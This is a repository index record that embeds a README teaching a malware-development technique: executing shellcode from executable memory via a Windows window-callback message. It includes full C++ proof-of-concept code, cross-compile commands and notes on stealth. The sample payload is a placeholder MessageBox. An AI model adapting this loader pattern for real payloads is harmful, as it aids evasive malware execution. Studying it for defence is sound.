{"id":28537216,"url":"https://github.com/malforge-maldev-public-organization/shellcode-injection-using-window-callbacks","last_synced_at":"2025-09-03T13:41:41.922Z","repository":{"id":291764394,"uuid":"978704121","full_name":"Malforge-Maldev-Public-Organization/Shellcode-Injection-Using-Window-Callbacks","owner":"Malforge-Maldev-Public-Organization","description":"A minimal Windows GUI demo that allocates memory and executes 64-bit shellcode to display a MessageBox. Demonstrates basic shellcode injection using `VirtualAlloc`, `memcpy`, and function pointers in C.","archived":false,"fork":false,"pushed_at":"2025-05-08T11:36:48.000Z","size":20,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-07-08T06:52:33.848Z","etag":null,"topics":["callback","shellcode-injection","windows"],"latest_commit_sha":null,"homepage":"https://malforge-group.in/","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Malforge-Maldev-Public-Organization.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-06T11:44:17.000Z","updated_at":"2025-05-09T08:34:19.000Z","dependencies_parsed_at":"2025-05-06T12:54:53.702Z","dependency_job_id":"fc9e04ea-8682-43f5-8798-edd10cf1e0de","html_url":"https://github.com/Malforge-Maldev-Public-Organization/Shellcode-Injection-Using-Window-Callbacks","commit_stats":null,"previous_names":["malforge-maldev-public-organization/shellcode-injection-using-window-callbacks"],"tags_count":0,"template":false,"template_full_name":null,"pur
l":"pkg:github/Malforge-Maldev-Public-Organization/Shellcode-Injection-Using-Window-Callbacks","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Malforge-Maldev-Public-Organization","download_url":"https://codeload.github.com/Malforge-Maldev-Public-Organization/Shellcode-Injection-Using-Window-Callbacks/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Malforge-Maldev-Public-Organization%2FShellcode-Injection-Using-Window-Callbacks/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273453585,"owners_count":25108470,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-03T02:00:09.631Z","response_time":76,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keyw
ords":["callback","shellcode-injection","windows"],"created_at":"2025-06-09T18:09:18.341Z","updated_at":"2025-09-03T13:41:41.904Z","avatar_url":"https://github.com/Malforge-Maldev-Public-Organization.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Shellcode Injection via Window Callbacks\n\nShellcode injection is a potent technique in security research and exploit development, enabling the execution of arbitrary machine code within a target process. This post focuses on **shellcode injection via window callbacks**, a method that leverages the Windows messaging system to execute shellcode through the `WndProc` function.\n\n---\n\n## Introduction to Shellcode Injection\n\n**Shellcode** is a small, position-independent sequence of machine instructions that performs specific tasks such as spawning shells, displaying messages, or establishing connections. It is a fundamental element in many exploits.\n\nShellcode injection typically involves:\n\n1. Injecting shellcode into the memory of a process.\n2. Redirecting code execution to the shellcode’s location.\n\nCommon techniques include thread injection, function pointer manipulation, and callback exploitation. This article focuses on **window callbacks**, a technique rooted in the Windows GUI subsystem.\n\n---\n\n## Understanding Window Callbacks\n\n### What is a Callback?\n\nA **callback** is a function registered to handle specific events or actions. 
In Windows programming, callbacks manage GUI events, such as mouse clicks or key presses.\n\n### Window Procedure (`WndProc`)\n\nThe `WndProc` is a user-defined function for handling messages sent to a window:\n\n```cpp\nLRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);\n```\n\nParameters:\n- `hwnd`: Handle to the window.\n- `msg`: Message identifier.\n- `wParam`, `lParam`: Additional message information.\n\n### Windows Messaging System\n\nWindows uses a **message queue** for GUI threads, which is processed in a loop using `GetMessage` and `DispatchMessage`. The system calls `WndProc` when dispatching messages, making it a suitable target for injection.\n\n---\n\n## Shellcode Injection via Window Callbacks\n\n### Concept\n\nThis technique involves:\n1. Creating a window with a custom `WndProc`.\n2. Allocating executable memory for shellcode.\n3. Copying the shellcode into memory.\n4. Modifying `WndProc` to run shellcode on a specific message.\n5. Triggering the message to execute the code.\n\n### Why Use Window Callbacks?\n\n- **Reliability**: The OS ensures `WndProc` is invoked for relevant messages.\n- **Legitimacy**: GUI callbacks are typical and less suspicious.\n- **Simplicity**: Easy to implement and control.\n\n---\n\n## Proof-of-Concept (POC) Code\n\nThis C++ code uses a basic 64-bit shellcode that shows a MessageBox. 
It includes memory allocation, execution, and cleanup.\n\n```cpp\n#include \u003cwindows.h\u003e\n\n// Simple shellcode to display a MessageBox (64-bit)\nunsigned char shellcode[] = {\n    0x48, 0x83, 0xEC, 0x28,\n    0x48, 0x31, 0xC9,\n    0x48, 0x8D, 0x15, 0x1E, 0x00, 0x00, 0x00,\n    0x4C, 0x8D, 0x05, 0x1F, 0x00, 0x00, 0x00,\n    0x48, 0x31, 0xC9,\n    0x48, 0xB8, /* MessageBoxA address placeholder */ 0,0,0,0,0,0,0,0,\n    0xFF, 0xD0,\n    0x48, 0x83, 0xC4, 0x28,\n    0xC3,\n    'H','e','l','l','o',' ','W','o','r','l','d',0,\n    'T','e','s','t',0\n};\n\nLRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {\n    static LPVOID shellcodeAddr = NULL;\n    if (msg == WM_USER + 100) {\n        shellcodeAddr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n        if (!shellcodeAddr) {\n            MessageBoxW(hwnd, L\"Failed to allocate memory\", L\"Error\", MB_OK | MB_ICONERROR);\n            return 0;\n        }\n        memcpy(shellcodeAddr, shellcode, sizeof(shellcode));\n        ((void(*)())shellcodeAddr)();\n        VirtualFree(shellcodeAddr, 0, MEM_RELEASE);\n        shellcodeAddr = NULL;\n        return 0;\n    }\n    if (msg == WM_DESTROY) {\n        PostQuitMessage(0);\n        return 0;\n    }\n    return DefWindowProcW(hwnd, msg, wParam, lParam);\n}\n\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\n    WNDCLASSW wc = { 0 };\n    wc.lpfnWndProc = WndProc;\n    wc.hInstance = hInstance;\n    wc.lpszClassName = L\"InjectWindow\";\n\n    if (!RegisterClassW(\u0026wc)) {\n        MessageBoxW(NULL, L\"Failed to register window class\", L\"Error\", MB_OK | MB_ICONERROR);\n        return 1;\n    }\n\n    HWND hwnd = CreateWindowExW(0, L\"InjectWindow\", L\"Shellcode Demo\", WS_OVERLAPPEDWINDOW,\n        CW_USEDEFAULT, CW_USEDEFAULT, 400, 300, NULL, NULL, hInstance, NULL);\n\n    if (!hwnd) {\n        MessageBoxW(NULL, L\"Failed to create 
window\", L\"Error\", MB_OK | MB_ICONERROR);\n        return 1;\n    }\n\n    ShowWindow(hwnd, nCmdShow);\n    UpdateWindow(hwnd);\n\n    SendMessageW(hwnd, WM_USER + 100, 0, 0);\n\n    MSG msg = { 0 };\n    while (GetMessageW(\u0026msg, NULL, 0, 0)) {\n        TranslateMessage(\u0026msg);\n        DispatchMessageW(\u0026msg);\n    }\n\n    return (int)msg.wParam;\n}\n```\n\n---\n\n## Compiling Shellcode on Kali Linux\n\nTo compile the above code for Windows on Kali Linux:\n\n### Prerequisites\n\n```bash\nsudo apt update\nsudo apt install mingw-w64\n```\n\n### Compilation\n\n```bash\nx86_64-w64-mingw32-g++ -static -static-libgcc -static-libstdc++ -DUNICODE -D_UNICODE -mwindows shellcode_injection.cpp -o shellcode_injection.exe\n```\n\nExplanation:\n- `-static`: Statically links libraries.\n- `-DUNICODE`: Enables Unicode support.\n- `-mwindows`: GUI subsystem (no console).\n- `shellcode_injection.cpp`: Your source file.\n\nTransfer the `.exe` to a 64-bit Windows environment and execute.\n\n\u003e Note: Ensure the shellcode is 64-bit (as provided) for compatibility.\n\u003e Test in a Windows VM, as Kali cannot run the .exe natively.\n\u003e Use `-g` for debugging symbols if needed: `-g -fdiagnostics-color=always`.\n\n---\n\n## POC (Test in VS Code)\n![image](https://github.com/user-attachments/assets/87adf252-6d12-4c16-89e4-dc3cb761faaa)\n\n## Code Explanation\n\n### Header and Shellcode\n\n```cpp\n#include \u003cwindows.h\u003e\n\n// Simple shellcode to display a MessageBox (64-bit)\nunsigned char shellcode[] = { ... };\n```\n`\u003cwindows.h\u003e`: Provides Windows API functions for windows, messaging, and memory.  \n**Shellcode**: A simplified 64-bit payload to call `MessageBoxA(\"Hello World\", \"Test\", 0, 0)`. 
It:\n- Sets up the stack and parameters.\n- Calls `MessageBoxA` (placeholder address).\n- Includes strings `\"Hello World\\0\"` and `\"Test\\0\"`.\n\n\u003e Note: The `MessageBoxA` address is a placeholder; a real implementation would resolve it dynamically.\n\n### Window Procedure (`WndProc`)\n\n```cpp\nLRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {\n    static LPVOID shellcodeAddr = NULL;\n    if (msg == WM_USER + 100) {\n        shellcodeAddr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n        if (!shellcodeAddr) {\n            MessageBoxW(hwnd, L\"Failed to allocate memory\", L\"Error\", MB_OK | MB_ICONERROR);\n            return 0;\n        }\n        memcpy(shellcodeAddr, shellcode, sizeof(shellcode));\n        ((void(*)())shellcodeAddr)();\n        VirtualFree(shellcodeAddr, 0, MEM_RELEASE);\n        shellcodeAddr = NULL;\n        return 0;\n    }\n    if (msg == WM_DESTROY) {\n        PostQuitMessage(0);\n        return 0;\n    }\n    return DefWindowProcW(hwnd, msg, wParam, lParam);\n}\n```\n\n**Purpose**: Processes messages and executes the shellcode.\n\n#### Key Elements:\n\n- `static LPVOID shellcodeAddr = NULL`: Tracks allocated memory.\n- `if (msg == WM_USER + 100)`: Executes shellcode for the custom message.\n- `VirtualAlloc`: Allocates executable memory.\n- `memcpy`: Copies the shellcode.\n- `((void(*)())shellcodeAddr)()`: Runs the shellcode.\n- `VirtualFree`: Frees memory to prevent leaks.\n- `WM_DESTROY`: Handles window closure, posting `WM_QUIT`.\n- `DefWindowProcW`: Processes unhandled messages.\n\n### Main Function\n\n```cpp\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\n    // Register window class\n    WNDCLASSW wc = { 0 };\n    wc.lpfnWndProc = WndProc;\n    wc.hInstance = hInstance;\n    wc.lpszClassName = L\"InjectWindow\";\n    if (!RegisterClassW(\u0026wc)) {\n        MessageBoxW(NULL, L\"Failed to register 
window class\", L\"Error\", MB_OK | MB_ICONERROR);\n        return 1;\n    }\n\n    // Create window\n    HWND hwnd = CreateWindowExW(0, L\"InjectWindow\", L\"Shellcode Demo\", WS_OVERLAPPEDWINDOW,\n                               CW_USEDEFAULT, CW_USEDEFAULT, 400, 300,\n                               NULL, NULL, hInstance, NULL);\n    if (!hwnd) {\n        MessageBoxW(NULL, L\"Failed to create window\", L\"Error\", MB_OK | MB_ICONERROR);\n        return 1;\n    }\n\n    // Show window\n    ShowWindow(hwnd, nCmdShow);\n    UpdateWindow(hwnd);\n\n    // Trigger shellcode\n    SendMessageW(hwnd, WM_USER + 100, 0, 0);\n\n    // Message loop\n    MSG msg = { 0 };\n    while (GetMessageW(\u0026msg, NULL, 0, 0)) {\n        TranslateMessage(\u0026msg);\n        DispatchMessageW(\u0026msg);\n    }\n\n    return (int)msg.wParam;\n}\n```\n\n**WinMain**: Uses the GUI entry point for compatibility with `-mwindows`.\n\n#### Window Setup:\n\n- Registers a window class (`InjectWindow`) with `WndProc`.\n- Creates a 400x300 window titled “Shellcode Demo”.\n\n**Display**: Shows and paints the window.  \n**Shellcode Trigger**: Sends `WM_USER + 100` to execute the shellcode.  \n**Message Loop**: Keeps the window responsive.  \n**Return**: Exits with the message loop’s result.\n\n## How It Works\n\n1. **Initialization**: Registers a window class and creates a window.\n2. **Display**: Shows a window titled “Shellcode Demo”.\n3. **Trigger**: Sends a message (`WM_USER + 100`) to execute shellcode.\n4. **Execution**:\n   - Allocates executable memory.\n   - Copies shellcode.\n   - Executes it.\n   - Frees the memory.\n5. **Loop**: Processes messages.\n6. 
**Output**: MessageBox with \"Hello World\" and title \"Test\".\n\n---\n\n## Security Implications\n\n### Malicious Use\n\n- **Malware**: Can be adapted to run spyware or other payloads.\n- **Exploitation**: Effective in GUI-based processes.\n- **Red Teaming**: Demonstrates post-exploitation techniques.\n\n### Why Effective?\n\n- **Stealthy**: Mimics GUI message handling.\n- **Controlled**: Triggered by specific messages.\n- **Simple**: Requires minimal code.\n\n---\n\n## Conclusion\n\nShellcode injection via window callbacks is a reliable and stealthy method for arbitrary code execution in Windows environments. The POC offers a practical introduction to shellcode behavior, memory management, and Windows internals. Always use responsibly in controlled labs or for red teaming.\n\nThank you for reading!\n\n— **Malforge Group**\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalforge-maldev-public-organization%2Fshellcode-injection-using-window-callbacks","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmalforge-maldev-public-organization%2Fshellcode-injection-using-window-callbacks","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalforge-maldev-public-organization%2Fshellcode-injection-using-window-callbacks/lists"}